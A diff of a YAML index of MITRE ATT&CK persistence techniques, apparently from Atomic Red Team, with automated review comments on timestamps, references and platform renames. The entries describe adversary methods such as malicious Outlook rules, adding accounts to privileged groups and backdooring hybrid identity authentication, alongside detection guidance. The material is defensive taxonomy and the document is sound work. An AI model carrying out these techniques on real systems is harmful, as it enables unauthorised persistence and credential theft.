Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
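Review bot: The `James TermServ DLL` reference swaps `twitter.com` for `x.com` and bumps the retrieved date to September 12, 2024 while `x_mitre_version` stays at `'1.0'`, which is consistent with a reference-only update. Since a single post on X can disappear at any time, consider pointing this reference at a web.archive.org capture, as the T1176 hunk below does for the kjaer.io link, so the citation remains resolvable.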
@@ -29813,8 +30179,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29845,71 +30211,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
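Review bot: the `Pfammatter - Hidden Inbox Rules` reference is deleted from the T1137.005 entry and its only visible citer, the removed `x_mitre_detection` text, goes with it; confirm that the retained Outlook Rules description (and any detection text emitted above this hunk) no longer contains `(Citation: Pfammatter - Hidden Inbox Rules)`, otherwise the citation token dangles with no matching `source_name`. Also, the unchanged context lines `kill_chain_phases:` / `phase_name: persistence` now sit inside the newly inserted T1098.007 entry rather than T1137.005, so check the emitted YAML gives T1098.007 both the persistence and privilege-escalation phases and that T1137.005 still carries its own `kill_chain_phases` block before the `atomic_tests: []` that closes it.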
@@ -29940,7 +30374,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
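Review bot: the `modified` timestamp for T1546.011 moves backwards, from `2022-04-25T14:00:00.188Z` to `2020-11-10T18:29:31.094Z`, and the same backward jump recurs throughout this patch (T1037.002, T1205, T1525, T1547.005, T1546.005, T1574.006, T1546.012, T1574.005, T1542.002, T1543.004, T1546.008) while other entries move forward to 2024 dates with spec 3.2.0. Several of the old values share the `14:00:00.188Z` suffix, which looks like a bulk-stamped export time rather than a per-object edit time, so the regression may well be correct; please state in the commit message which ATT&CK bundle the index is now generated from and whether objects are deduplicated by latest `modified`, so reviewers can tell intended re-sourcing from the generator picking a stale object version.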
@@ -29995,13 +30429,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
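Review bot: removing both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` leaves T1546.011 with no attack spec version anywhere in this hunk, whereas elsewhere in the patch the old `2.1.0` line is removed only where `x_mitre_attack_spec_version: 3.2.0` is re-added in the new key order. If the field is genuinely absent from the source object, that is fine, but consumers that key on `x_mitre_attack_spec_version` will now see a mix of entries with and without it; consider having the generator emit a default, or note the gap in the commit message.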
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -30062,9 +30494,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -30073,7 +30505,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -30126,7 +30557,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30147,12 +30578,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30236,11 +30666,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30253,7 +30682,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -30266,7 +30694,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -30296,7 +30723,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -30328,7 +30756,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30350,8 +30778,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30377,7 +30803,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30403,36 +30829,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
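Review bot: the Azure AD to Entra ID rename is applied consistently in the description prose, and the citation keys (`Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers`, `AADInternals Azure AD On-Prem to Cloud`) together with the `AzureADConnectAuthenticationAgentService` name are correctly left untouched, since the former must match their `source_name` entries byte-for-byte and the latter is the real service name. Worth one sentence in the commit message saying so, so that a later cleanup pass does not "fix" those remaining Azure AD strings and break the citation lookups.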
@@ -30440,9 +30864,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30451,21 +30875,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
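Review bot: dropping `Azure AD`, `Google Workspace` and `Office 365` from `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` changes which per-platform views this technique lands in; confirm that any index files keyed on the old platform names were regenerated in the same change, otherwise T1556.007 (and T1078.001, whose platform list is rewritten the same way later in this patch) silently disappears from the Azure AD / Google Workspace / Office 365 views without showing up in a replacement. The accompanying `x_mitre_version` bump from 1.0 to 1.1 is consistent with the platform change.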
@@ -30505,13 +30930,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
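Review bot: the unchanged context lines of the T1543.004 description show the generator turning inline code into hard line breaks inside the `|-` block (`/System/Library/LaunchDaemons/`, `Label`, `Program` and `RunAtLoad` each end a line and the following punctuation or conjunction starts the next), so the text renders as broken sentences; the same artefact is visible later in this patch in the Trap description (`ctrl+c` / `ctrl+d`) and the IFEO description (`C:\dbg\ntsd.exe -g notepad.exe`). It is pre-existing, but since this change regenerates these descriptions anyway it is the natural place to fix the markup-to-newline conversion in the generator rather than carry the breaks forward.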
@@ -30588,12 +31010,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30612,6 +31033,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30619,7 +31041,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30639,29 +31060,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
